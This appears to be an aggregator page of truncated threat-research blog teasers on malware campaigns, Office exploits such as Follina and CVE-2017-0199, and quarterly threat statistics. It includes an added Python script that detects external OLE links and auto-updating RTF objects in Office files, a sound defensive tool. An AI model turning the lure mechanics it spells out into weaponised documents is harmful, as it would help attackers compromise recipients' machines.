If you want to learn more about our crimeware reporting service, please contact us at [email protected].
## DarkGate
In Jun
Qualys
Part 2: An In-Depth Look at the Latest Vulnerability Threat Landscape (Attackers’ Edition)
blogs_qualys·2023-07-18
Part 2: An In-Depth Look at the Latest Vulnerability Threat Landscape (Attackers’ Edition)
## Table of Contents
Top Ten Vulnerabilities Exploited by Threat Actors
Top Ten Highly Active Threat Actors
Top Ten Most Exploited Vulnerabilities by Malware
Top Ten Most Active Malware
Top Ten Vulnerabilities Exploited by Ransomware
Prioritizing Exploited Vulnerabilities with Qualys VMDR and TruRisk
Assess Your Organization's Exposure to Risk / TruRisk Dashboard
Key Insights & Takeaways
References
Additional Contributor
The previous blog from this three-part series showcased an overview of the vulnerability threat landscape. To summarize quickly, it illustrated the popular methods of exploiting vulnerabilities and the tactical techniques employed by threat actors, malware, and ransomware groups. Perhaps more crucially, we stated that commonly used solutions (CISA KEV/EPSS) of
Fortinet
New Fast-Developing ThirdEye Infostealer Pries Open System Information | FortiGuard Labs
blogs_fortinet·2023-06-27
New Fast-Developing ThirdEye Infostealer Pries Open System Information | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
New Fast-Developing ThirdEye Infostealer Pries Open System Information
By Fred Gutierrez, James Slaughter, and Shunichi Imano | June 27, 2023
Affected platforms: Windows
Impacted parties: Windows Users
Impact: The information collected can be used for future attacks
Severity level: Medium
FortiGuard Labs recently came across files that look suspicious, even during a cursory review. Our subsequent investigation confirmed that the files are malicious and revealed there is more to them than meets the eye: they are a previously unseen infostealer we have named “ThirdEye”. While this malware is not considered sophisticated, it’s designed to steal various information from compromised machines that can be used as stepping-stones for future attacks.
This blog po
Securelist
Non-mobile malware statistics, Q1 2023
blogs_securelist·2023-06-07
Non-mobile malware statistics, Q1 2023
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Most prolific groups
- Miners
- Vulnerable applications used in cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution in Q1 2023
- IT threat evolution in Q1 2023. Non-mobile statistics
- IT threat evolution in Q1 2023. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q1 2023:
- Kaspersky solutions blocked 865,071,227 attacks launched from online resources across the globe.
- Web Anti-Virus detected 246,912,694 unique URLs.
- Attempts to run malware fo
Securelist
IT threat evolution in Q1 2023. Non-mobile statistics
blogs_securelist·2023-06-07
IT threat evolution in Q1 2023. Non-mobile statistics
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Geography of financial malware attacks
Ransomware programs
Quarterly trends and highlights
Attacks on Linux and VMWare ESXi servers
Progress in combating cybercrime
Conti-based Trojan decrypted
Most prolific groups
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacked users
TOP 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used in cyberattacks
Quarterly highlights
Vulnerability statistics
Attacks on macOS
Geography of threats for macOS
IoT attacks
IoT threat statistics
Attacks via web resources
Countries/territories
Fortinet
AndoryuBot – New Botnet Campaign Targets Ruckus Wireless Admin Remote Code Execution Vulnerability (CVE-2023-25717) | FortiGuard Labs
blogs_fortinet·2023-05-08·CVSS 9.8
CVE-2023-25717 [CRITICAL] AndoryuBot – New Botnet Campaign Targets Ruckus Wireless Admin Remote Code Execution Vulnerability (CVE-2023-25717) | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
AndoryuBot – New Botnet Campaign Targets Ruckus Wireless Admin Remote Code Execution Vulnerability (CVE-2023-25717)
By Cara Lin | May 08, 2023
Affected platforms: Linux
Impacted parties: Any organization
Impact: Remote attackers gain control of vulnerable systems
Severity level: Critical
In April, FortiGuard Labs observed a unique botnet based on the SOCKS protocol distributed through the Ruckus vulnerability (CVE-2023-25717). This botnet, known as AndoryuBot, first appeared in February 2023. It contains DDoS attack modules for different protocols and communicates with its command-and-control server using SOCKS5 proxies. Based on our IPS signatures trigger count (Figure 1), this campaign started distributing the current version sometime after mid-April.
Fortinet
Moobot Strikes Again - Targeting Cacti And RealTek Vulnerabilities | FortiGuard Labs
blogs_fortinet·2023-03-29·CVSS 9.8
[CRITICAL] Moobot Strikes Again - Targeting Cacti And RealTek Vulnerabilities | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Moobot Strikes Again - Targeting Cacti And RealTek Vulnerabilities
By Cara Lin | March 29, 2023
Affected platforms: Windows, Linux
Impacted parties: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity level: Critical
FortiGuard Labs observed several attacking bursts targeting Cacti and Realtek vulnerabilities in January and March of this year and then spreading ShellBot and Moobot malware. (Figure 1 shows trigger counts from our IPS signatures of the CVE-2021-35394 (Realtek) and CVE-2022-46169 (Cacti) vulnerabilities.)
ShellBot, also known as PerlBot, is malware developed in Perl that uses the Internet Relay Chat (IRC) protocol to communicate with its server. Moobot is a Mirai variant botnet that targets exposed net
Securelist
IT threat evolution in Q3 2022. Non-mobile statistics
blogs_securelist·2022-11-18
IT threat evolution in Q3 2022. Non-mobile statistics
Table of Contents
Quarterly figures
Financial threats
Number of users attacked by banking malware
TOP 10 banking malware families
Geography of financial malware attacks
Ransomware programs
Quarterly trends and highlights
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacked users
TOP 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used by criminals during cyberattacks
Quarterly highlights
Vulnerability statistics
Attacks on macOS
TOP 20 threats for macOS
Geography of threats for macOS
IoT attacks
IoT threat statistics
Attacks via web resources
Countries and territories that serve as sources of web-ba
Securelist
PC malware statistics, Q3 2022
blogs_securelist·2022-11-18
PC malware statistics, Q3 2022
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by criminals during cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution in Q3 2022
- IT threat evolution in Q3 2022. Non-mobile statistics
- IT threat evolution in Q3 2022. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q3 2022:
- Kaspersky solutions blocked 956,074,958 attacks from online resources across the globe.
- Web Anti-Virus recognized 251,288,987 unique URLs as malicious.
- Attempts to run malware fo
Talos
New campaign uses government, union-themed lures to deliver Cobalt Strike beacons
blogs_talos·2022-09-28·CVSS 7.8
[HIGH] New campaign uses government, union-themed lures to deliver Cobalt Strike beacons
- Cisco Talos discovered a malicious campaign in August 2022 delivering Cobalt Strike beacons that could be used in later, follow-on attacks.
- Lure themes in the phishing documents in this campaign are related to the job details of a government organization in the United States and a trade union in New Zealand.
- The attack involves a multistage and modular infection chain with fileless, malicious scripts.
Cisco Talos recently discovered a malicious campaign with a modularised attack technique to deliver Cobalt Strike beacons on infected endpoints.
The initial vector of this attack is a phishing email with a malicious Microsoft Word document attachment containing an exploit for CVE-2017-0199, a remote code execution vulnerability in Microsoft Office. If a
Tenable
Cybersecurity Snapshot: 6 Things That Matter Right Now
blogs_tenable·2022-08-19
Cybersecurity Snapshot: 6 Things That Matter Right Now
Fortinet
Life After Death—SmokeLoader Continues to Haunt Using Old Vulnerabilities
blogs_fortinet·2022-08-09·CVSS 7.8
[HIGH] Life After Death—SmokeLoader Continues to Haunt Using Old Vulnerabilities
FORTIGUARD LABS THREAT RESEARCH
Life After Death—SmokeLoader Continues to Haunt Using Old Vulnerabilities
By James Slaughter | August 09, 2022
Vulnerability management and remediation are some of the most difficult problems to tackle within an organization. Multiple solutions, watchlists, and warnings are designed to ensure that companies and end users patch their software against known security vulnerabilities.
Unfortunately, even with tools available and teams forewarned with up-to-date information, this often does not happen in a timely manner or even at all. This is usually due to outdated software, overworked teams, or even negligence or incompetence—and threat actors know this. Patching is often mundane and tedious work. Organizations that are either late, inconsistent, or sloppy
Tenable
Analyzing the Vulnerabilities Associated with the Top Malware Strains of 2021
blogs_tenable·2022-08-04
Analyzing the Vulnerabilities Associated with the Top Malware Strains of 2021
Securelist
CVE-2022-30190 (Follina) vulnerability in MSDT: description and counteraction
blogs_securelist·2022-06-06·CVSS 7.8
CVE-2022-30190 [HIGH] CVE-2022-30190 (Follina) vulnerability in MSDT: description and counteraction
Table of Contents
CVE-2022-30190 technical details
Protecting against Follina
Authors
AMR
At the end of May, researchers from the nao_sec team reported a new zero-day vulnerability in Microsoft Support Diagnostic Tool (MSDT) that can be exploited using Microsoft Office documents. It allowed attackers to remotely execute code on Windows systems even if the victim never opened the document containing the exploit, or opened it only in Protected View. The vulnerability, which the researchers dubbed Follina, later received the identifier CVE-2022-30190.
## CVE-2022-30190 technical details
Briefly, the exploitation of the CVE-2022-30190 vulnerability can be described as follows. The attacker creates an MS Office document with a link to an external malicious OLE object ( word/_rels/documen
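Both the Talos Word lure quoted earlier and the Follina technique described just above come down to an Office file that points at an OLE object outside itself: an oleObject relationship with TargetMode="External" in the OOXML package, or, in the RTF form that CVE-2017-0199 lures commonly take, an embedded object flagged \objupdate so that Word loads it as the document opens. The Python below is an added triage script, not code from Talos, Kaspersky or any tool named on this page. It goes a little beyond the Word case by scanning every .rels part in the package, so Excel and PowerPoint containers are covered too, and it builds its own sample documents in memory. The function names, the constructed samples and the example.invalid URL are assumptions made for the demonstration.

```python
"""Static triage for Office lures that point at an OLE object outside the file.

Added example, not code from Talos, Kaspersky or any project quoted on this page.
  1. OOXML: an oleObject relationship with TargetMode="External", i.e. the
     document links to a remote OLE object (the word/_rels/document.xml.rels
     entry the Follina write-up mentions; CVE-2017-0199 .docx lures look alike).
  2. RTF: an \\object group carrying both \\objdata and \\objupdate, the control
     word that makes Word load the object as the file opens.
All sample documents are constructed in memory; nothing here is a real lure.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = ("http://schemas.openxmlformats.org/officeDocument/2006/"
           "relationships/oleObject")


def external_ole_relationships(ooxml_bytes):
    """Return (rels_part, target) for every external oleObject relationship.
    Every *.rels part is scanned, so Word, Excel and PowerPoint are covered."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(ooxml_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                continue  # damaged rels part: out of scope for this check
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                mode = rel.get("TargetMode", "Internal").lower()
                if rel.get("Type") == OLE_REL and mode == "external":
                    hits.append((name, rel.get("Target", "")))
    return hits


_OBJUPDATE = re.compile(rb"\\objupdate\b")
_OBJDATA = re.compile(rb"\\objdata\b")
_OBJCLASS = re.compile(rb"\\objclass\s*([A-Za-z0-9._]+)")


def rtf_autoupdate_objects(rtf_bytes):
    """Return the objclass of each RTF object that carries \\objupdate.
    Word accepts any header starting with {\\rt, so that prefix is the RTF test."""
    if not rtf_bytes.lstrip().startswith(b"{\\rt"):
        return []
    findings = []
    # Each \object control word opens one embedded-object group; the text up to
    # the next \object (or end of file) belongs to that group.
    for group in re.split(rb"\\object\b", rtf_bytes)[1:]:
        if _OBJUPDATE.search(group) and _OBJDATA.search(group):
            cls = _OBJCLASS.search(group)
            findings.append(cls.group(1).decode("ascii") if cls else "<no objclass>")
    return findings


def triage(filename, data):
    """Return human-readable findings for one file; an empty list means no hit."""
    findings = []
    if data[:2] == b"PK":
        for rels_part, target in external_ole_relationships(data):
            findings.append(f"{filename}: external OLE link in {rels_part} -> {target}")
    else:
        for cls in rtf_autoupdate_objects(data):
            findings.append(f"{filename}: RTF object '{cls}' carries \\objupdate")
    return findings


def build_sample_docx(target, external=True):
    """Constructed sample: minimal OOXML package with one oleObject relationship."""
    mode = ' TargetMode="External"' if external else ""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{RELS_NS}">'
        f'<Relationship Id="rId1" Type="{OLE_REL}" Target="{target}"{mode}/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


# Constructed sample: linked Word object forced to update on open (objdata hex is a placeholder).
SAMPLE_RTF = (
    b"{\\rtf1\\ansi{\\object\\objautlink\\objupdate\\objw100\\objh100"
    b"{\\*\\objclass Word.Document.8}{\\*\\objdata 0105000002000000}}\\par}"
)
# Constructed sample: ordinary embedded spreadsheet with no auto-update, must not be flagged.
BENIGN_RTF = (
    b"{\\rtf1\\ansi{\\object\\objemb{\\*\\objclass Excel.Sheet.8}"
    b"{\\*\\objdata 0105000002000000}}\\par}"
)
```

Treat a hit as a triage signal rather than a verdict: \objupdate also appears in legitimately linked objects, and a flagged package still needs its target or its objdata stream examined with a proper OLE parser (oletools' rtfobj and oleobj, for instance) before anyone calls it an exploit.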
Huntress
Rapid Response: Microsoft Office RCE - “Follina” MSDT Attack | Huntress
blogs_huntress·2022-05-30·CVSS 7.8
[HIGH] Rapid Response: Microsoft Office RCE - “Follina” MSDT Attack | Huntress
This post, as is the norm for emerging threats, is a developing article and may be subject to change as the Huntress team learns more about this attack vector and new information is available.
UPDATE 4:51pm ET June 14, 2022:
Microsoft announced an available patch for the Follina exploit. Our team has been working to validate the patch, and we have tested and verified that the patch is effective both for Windows 10 and Windows 11.
Just to note, your KB number may vary based on your operating system; check out Microsoft's update for the full list.
(The screenshots in the original post show the exploit code, and then the raw command, failing to execute on Windows 10.)
UPDATE 11:16pm ET May 30, 2022:
Microsoft has now revealed the CVE identifier for this vulnerability is CVE-2022-30190, including a Security U
Qualys
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
blogs_qualys·2022-02-23
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
#### Table of Contents
- Situation
- Directive Scope
- CISA Catalog of Known Exploited Vulnerabilities
- Detect CISA Vulnerabilities Using Qualys VMDR
- CISA Exploited RTI
- Detailed Operational Dashboard
- Remediation
- Federal Enterprises and Agencies Can Act Now
- Summary
- Getting Started
CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively.
## Situation
In November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directiv
Securelist
The BlueNoroff cryptocurrency hunt is still on
blogs_securelist·2022-01-13
The BlueNoroff cryptocurrency hunt is still on
Table of Contents
- The latest BlueNoroff’s infection vector
- Malware infection
  - Infection chain #1. Windows shortcut
  - Infection chain #2. Weaponized Word document
- Assets theft
  - Collecting credentials
  - Stealing cryptocurrency
- SnatchCrypto’s victims
- SnatchCrypto’s attribution
  - VBA macro authorship
  - PowerShell scripts overlap
  - Backdoor overlap
- BlueNoroff’s indicators of compromise
- Powershell agent(VBS-wrapped)
Authors
- Seongsu Park
- Vitaly Kamluk
BlueNoroff is the name of an APT group coined by Kaspersky researchers while investigating the notorious attack on Bangladesh’s Central Bank back in 2016. A mysterious group with links to Lazarus and an unusual financial motivation for an APT. The group seems to work more like a unit within a larger formation of Lazarus attackers, with the ability to tap into its vast resources: be it malware implants, exploits, or infrastructure. See our earlier publication about BlueNoroff attacks on the banking sector.
Also, we have previous
Fortinet
SHODAN Your ICS Network – The BACnet Story | Fortinet
blogs_fortinet·2021-10-27
SHODAN Your ICS Network – The BACnet Story | Fortinet
FORTINET NEWS & UPDATES
SHODAN Your ICS Network – The BACnet Story
By Moshe Ben Simon | October 27, 2021
Mapping the entire ICS network using a single BBMD device
Shodan is a search engine similar to Google, but instead of searching for websites it searches for internet-connected devices—from routers and servers to Internet of Things (IoT) and OT devices. It can find any connected device, from thermostats and baby monitors to complex tools like SCADA systems that govern a wide range of industries, including energy, power, and transportation.
The Shodan Project's main goal was to search for devices linked to the Internet, but its goodwill became problematic as soon as Shodan began discovering industrial supervisory control and data acquisition (SCADA) systems, security cameras, traffic l
Trendmicro
FormBook Adds Latest Office 365 0-Day Vulnerability CVE-2021-40444 to Its Arsenal
blogs_trendmicro·2021-09-29·CVSS 7.8
CVE-2021-40444 [HIGH] FormBook Adds Latest Office 365 0-Day Vulnerability CVE-2021-40444 to Its Arsenal
Exploits & Vulnerabilities
## FormBook Adds Latest Office 365 0-Day Vulnerability (CVE-2021-40444) to Its Arsenal
Trend Micro detected a new campaign using a recent version of the known FormBook infostealer. Newer FormBook variants used the recent Office 365 zero-day vulnerability, CVE-2021-40444.
By: Trend Micro Sep 29, 2021 Read time: ( words)
Save to Folio
Trend Micro detected a new campaign using a recent version of the known FormBook malware, an infostealer that has been around since 2016. Several analyses have been written about FormBook in the last few years, including the expanded support for macOS. FormBook is famous for highly obfuscated payloads and the use of document CVE exploitation. Until recently, FormBook mostly exploited CVE-2017-0199, but newer FormBook variants us
Fortinet
Microsoft MSHTML Remote Code Execution Vulnerability Exploited in the Wild (CVE-2021-40444) | FortiGuard Labs
blogs_fortinet·2021-09-09·CVSS 8.8
CVE-2021-40444 [HIGH] Microsoft MSHTML Remote Code Execution Vulnerability Exploited in the Wild (CVE-2021-40444) | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Microsoft MSHTML Remote Code Execution Vulnerability Exploited in the Wild (CVE-2021-40444)
By Val Saengphaibul | September 09, 2021
FortiGuard Labs Threat Research Report
On September 7, 2021, Microsoft disclosed an active in-the-wild attack affecting Microsoft Windows. This vulnerability, CVE-2021-40444, is a remote code execution vulnerability in MSHTML, and it does not currently have a patch. MSHTML, also referred to as Trident, is a legacy proprietary browser engine specific to Internet Explorer and Windows platforms. In-the-wild attacks on targets were observed to be using specially crafted malicious Microsoft Office documents. Like most such attacks, targets have to be compelled or lured to open the malicious document for it to run successfully.
Thi
Securelist
APT trends report Q2 2021
blogs_securelist·2021-07-29
APT trends report Q2 2021
Table of Contents
The most remarkable findings
Russian-speaking activity
Chinese-speaking activity
Middle East
Southeast Asia and Korean Peninsula
Other interesting discoveries
Final thoughts
Authors
GReAT
For more than four years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.
This is our latest installment, focusing on activities that we observed during Q2 2021.
Readers who would like to learn
Fortinet
Signed, Sealed, and Delivered – Signed XLL File Delivers Buer Loader | FortiGuard Labs
blogs_fortinet·2021-07-19
Signed, Sealed, and Delivered – Signed XLL File Delivers Buer Loader | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Signed, Sealed, and Delivered – Signed XLL File Delivers Buer Loader
By Val Saengphaibul and Fred Gutierrez | July 19, 2021
FortiGuard Labs has discovered a malicious spam campaign that uses the names of two well-known corporate entities as a social engineering lure to trick a target into opening a maliciously crafted Microsoft Excel document. When opened, the document contacts a remote server that downloads a malicious payload from a predefined website. What makes this campaign different from similar malicious spam campaigns is the use of a signed Microsoft Excel file with an .XLL file extension, rather than the standard .XLS file extension.
In this blog, we will examine details of this attack as well as the infrastructure they used. The reader will see
Tenable
Daisy Chaining: How Vulnerabilities Can Be Greater Than the Sum of Their Parts
blogs_tenable·2021-01-21
Daisy Chaining: How Vulnerabilities Can Be Greater Than the Sum of Their Parts
Securelist
IT threat evolution Q3 2020. Non-mobile statistics
blogs_securelist·2020-11-20
IT threat evolution Q3 2020. Non-mobile statistics
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Attack geography
Ransomware programs
Quarterly trends and highlights
Number of new modifications
Number of users attacked by ransomware Trojans
Attack geography
Miners
Number of new modifications
Number of users attacked by miners
Attack geography
Vulnerable applications used by cybercriminals during cyberattacks
Attacks on macOS
Threat geography
IoT attacks
IoT threat statistics
Attacks via web resources
Countries that are sources of web-based attacks: Top 10
Countries where users faced the greatest risk of online infection
Local threats
Countries where users faced the highest risk of local infection
Authors
Victor Chebyshev
Fedor Sinitsyn
Denis Parinov
Oleg Kupreev
Evgeny Lopatin
Alexey Kulaev
Alexander Kolesnikov
These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q3:
- Kaspersky solutions blocked 1,416,295,227 attacks launched from online resources across the globe.
- 456,573,467 unique URLs were recognized as malicious by Web Anti-Virus components.
- Attempts to run malware for stealing
Securelist
IT threat evolution Q2 2020. PC statistics
blogs_securelist·2020-09-03
IT threat evolution Q2 2020. PC statistics
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by cybercriminals during cyberattacks
- Attacks on Apple macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- Victor Chebyshev
- Evgeny Lopatin
- Fedor Sinitsyn
- Denis Parinov
- Oleg Kupreev
- Alexey Kulaev
- Alexander Kolesnikov
IT threat evolution Q2 2020. Review
IT threat evolution Q2 2020. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q2:
- Kaspersky solutions blocked 899,744,810 attacks launched from online resources in 191 countries across the globe.
- As many as 286,
Sentinelone
The BLINDINGCAN RAT and Malicious North Korean Activity
blogs_sentinelone·2020-08-31
The BLINDINGCAN RAT and Malicious North Korean Activity
There has been a great deal of coverage lately around malicious activities attributed to North Korea (and/or adjacent entities ). Most recently, this has culminated in the release of MAR (Malware Analysis Report) AR20-232A , which covers activities associated with the BLINDINGCAN RAT . This tool is the latest in a very long line of tools which allow attackers to maintain access to target environments as well as establish ongoing control of infected hosts. In this post, we give an overview of this campaign in context of other related campaigns, describing its infection vector, execution and high-level behavior.
## Infection Vector
As we know, email phishing attacks are still the dominant method of delivering malware when it comes to these types of attacks. The BLINDINGCAN campaigns are no
Unit42
The State of Exploit Development: 80% of Exploits Publish Faster than CVEs
blogs_unit42·2020-08-26
The State of Exploit Development: 80% of Exploits Publish Faster than CVEs
## The State of Exploit Development: 80% of Exploits Publish Faster than CVEs
Jay Chen
Published: August 26, 2020
## Executive Summary
With the ever-increasing number of new vulnerabilities, vulnerability management becomes one of the most critical processes in ensuring continuous business operation. While it is clear that timely patching is essential, it’s also important to know quantitatively how a delay could increase risk. What is the chance that attackers breach my organization using a CVE just disclosed or using an unknown (zero-day) vulnerability? To understand the state of vulnerability disclosure and exploit development, Unit 42 researchers analyzed 45,450 publicly available exploits in Exploit Database at the time of this writing. The research correlated the exploit data with vulnerability and patch information to study exploit development in multiple facets.
The research reveals that:
-
Sentinelone
Why On-Device Detection Matters: New Ramsay Trojan Targets Air-Gapped Networks
blogs_sentinelone·2020-05-20·CVSS 7.8
[HIGH] Why On-Device Detection Matters: New Ramsay Trojan Targets Air-Gapped Networks
The Ramsay “framework” emerged in late 2019 and was disclosed thanks to a discovery by researchers querying the VirusTotal public malware repository. As of April 2020, there appears to be two fully maintained branches of the toolkit. Although in-the-wild instances of the Ramsay malware appear to be low at present, this may be due to the malware’s highly-specialized objectives. The Ramsay samples discovered to date are heavily focused on both persistence and data exfiltration from air-gapped environments. This suggests the possibility that the malware was developed for advanced targeted campaigns by a threat actor primarily interested in organizations trying to protect the most-sensitive of information. As is often the case with specialized malware, there is also a real danger of it “leakin
Unit42
COVID-19 Themed Malware Within Cloud Environments
blogs_unit42·2020-05-11
COVID-19 Themed Malware Within Cloud Environments
## COVID-19 Themed Malware Within Cloud Environments
Nathaniel Quist
Published: May 11, 2020
## Executive Summary
Unit 42 researchers found that public cloud infrastructure has communicated with domains known to distribute COVID-19 themed malware. On March 24, 2020, Unit 42 published a blog discussing attack patterns used by malicious actors in relation to the novel Coronavirus (COVID-19). Taking these findings a step further, researchers attempted to uncover if there are malicious COVID-19 related events taking place within public cloud infrastructure. If indications of this activity were found, how could organizations protect themselves?
Researchers identified 300+ COVID-19 themed malware samples that communicated with 20 unique IP addresses and domain indicators of compromise (IOCs). After querying Prisma Cloud for network connections to these 20 suspicious IOCs between March
Tenable
Critical Vulnerabilities You Need to Find and Fix to Protect the Remote Workforce
blogs_tenable·2020-04-13
Critical Vulnerabilities You Need to Find and Fix to Protect the Remote Workforce
Fortinet
Offense and Defense – A Tale of Two Sides: Bypass UAC | FortiGuard Labs
blogs_fortinet·2020-04-01
Offense and Defense – A Tale of Two Sides: Bypass UAC | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Offense and Defense – A Tale of Two Sides: Bypass UAC
By Anthony Giandomenico | April 01, 2020
FortiGuard Labs Threat Analysis Report
This is the 2nd installment of the “Offense and Defense – A Tale of Two Sides” blog series, where we focus on different tactics and techniques malicious actors use to complete their cyber missions—and how organizations can detect and ultimately prevent them. You can check out the blog series at Offense and Defense – A Tale of Two Sides: Group Policy and Logon Scripts, Offense and Defense – A Tale of Two Sides: PowerShell, and Offense and Defense – A Tale of Two Sides: OS Credential Dumping.
Introduction
In this month’s “Offense and Defense – A Tale of Two Sides” blog, we will be walking through a new technique in sequence
Fortinet
The Curious Case of DeathRansom: Part I
blogs_fortinet·2020-01-02
The Curious Case of DeathRansom: Part I
FORTIGUARD LABS THREAT RESEARCH
The Curious Case of DeathRansom: Part I
By Minh Tran | January 02, 2020
A FortiGuard Labs Threat Analysis Report
Introduction
Ransomware is certainly a significant global threat. According to one recent report, ransomware is estimated to have cost businesses more than $8 billion in 2018, up from just $1 billion in 2016, while this year alone losses for the healthcare industry have already reached $25 billion.
Part of this increase is due to the rise of Ransomware as a Service, with variants such as GandCrab generating as much as $2 billion in revenue for its developers, and our observation in the FortiGuard Labs Threat Landscape Report for Q3 that two additional ransomware families – Sodinokibi and Nemty – have now been deployed as RaaS solutions as well
Qualys
Top 19+ Vulnerability CVEs in Santa’s Dashboard Tracking
blogs_qualys·2019-12-27·CVSS 8.8
[HIGH] Top 19+ Vulnerability CVEs in Santa’s Dashboard Tracking
A recent report identified 19+ vulnerabilities that should be mitigated by the end of 2019. These are a range of top vulnerabilities attacked and leveraged by Advanced Persistent Threat (APT) actors from all parts of the world.
The list below shows those top 19 vulnerabilities, and it should be no surprise that you can easily track and remediate them via a dashboard within Qualys. Import the dashboard into your subscription for easy insight into what assets and vulnerabilities in your organization are at risk.
| No. | CVE | Products Affected by CVE | CVSS Score (NVD) | Examples of Threat Actors |
|---|---|---|---|---|
| 1 | CVE-2017-11882 | Microsoft Office | 7.8 | APT32 (Vietnam), APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Silent Group (Russia), Lotus Blossom (China), FIN7 (Russia) |
| 2 | CVE-2018- | | | |
Securelist
RevengeHotels: cybercrime targeting hotel front desks worldwide
blogs_securelist·2019-11-28·CVSS 7.8
[HIGH] RevengeHotels: cybercrime targeting hotel front desks worldwide
Authors
GReAT
RevengeHotels is a targeted cybercrime malware campaign against hotels, hostels, hospitality and tourism companies, mainly, but not exclusively, located in Brazil. We have confirmed more than 20 hotels that are victims of the group, located in eight states in Brazil, but also in other countries such as Argentina, Bolivia, Chile, Costa Rica, France, Italy, Mexico, Portugal, Spain, Thailand and Turkey. The goal of the campaign is to capture credit card data from guests and travelers stored in hotel systems, as well as credit card data received from popular online travel agencies (OTAs) such as Booking.com.
The main attack vector is via email with crafted Word, Excel or PDF documents attached. Some of them exploit CVE-2017-0199, loading it using VBS and PowerShell scripts and
Zscaler
Fileless malware campaign roundup | Blog
blogs_zscaler·2019-10-31
Fileless malware campaign roundup | Blog
Trendmicro
Analysis: New Remcos RAT Arrives Via Phishing Email
blogs_trendmicro·2019-08-15·CVSS 7.8
[HIGH] Analysis: New Remcos RAT Arrives Via Phishing Email
# Analysis: New Remcos RAT Arrives Via Phishing Email
By: Aliakbar Zahravi
2019/08/15
In July, we came across a phishing email purporting to be a new order notification, which contains a malicious attachment that leads to the remote access tool Remcos RAT (detected by Trend Micro as BKDR_SOCMER.SM). This attack delivers Remcos using an AutoIt wrapper that incorporates various obfuscation and anti-debugging techniques to evade detection, which is a common method for distributing known malware.
Remcos RAT emerged in 2016 being peddled as a service
Fortinet
CVE-2019-0708 – Remote Desktop Protocol and Remote Code Execution #Bluekeep
blogs_fortinet·2019-05-23·CVSS 9.8
CVE-2019-0708 [CRITICAL] CVE-2019-0708 – Remote Desktop Protocol and Remote Code Execution #Bluekeep
FORTIGUARD LABS THREAT RESEARCH
CVE-2019-0708 – Remote Desktop Protocol and Remote Code Execution #Bluekeep
By FortiGuard SE Team | May 23, 2019
On May 14th, 2019, Microsoft released their usual set of updates, referred to within the industry as “Patch Tuesday.” At first glance, the inclusion of CVE-2019-0708 appeared to be similar to all the other updates released on that day—it included a writeup containing an overview of the update, including the Impact (Remote Code Execution), Severity (Critical), and Platforms (multiple) affected.
However, what piqued the curiosity of the security community was that the platforms listed as affected by this vulnerability were products considered to be no longer supported by Microsoft:
Windows XP SP3 x86, Windows XP Professional x64 Edition SP2, Win
Securelist
IT threat evolution Q1 2019. Statistics
blogs_securelist·2019-05-23
IT threat evolution Q1 2019. Statistics
Table of Contents
- Quarterly figures
- Mobile threats
- Attacks on Apple macOS
- IoT attacks
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by cybercriminals
- Attacks via web resources
- Local threats
Authors
- Victor Chebyshev
- Fedor Sinitsyn
- Denis Parinov
- Boris Larin
- Oleg Kupreev
- Evgeny Lopatin
These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data.
## Quarterly figures
According to Kaspersky Security Network,
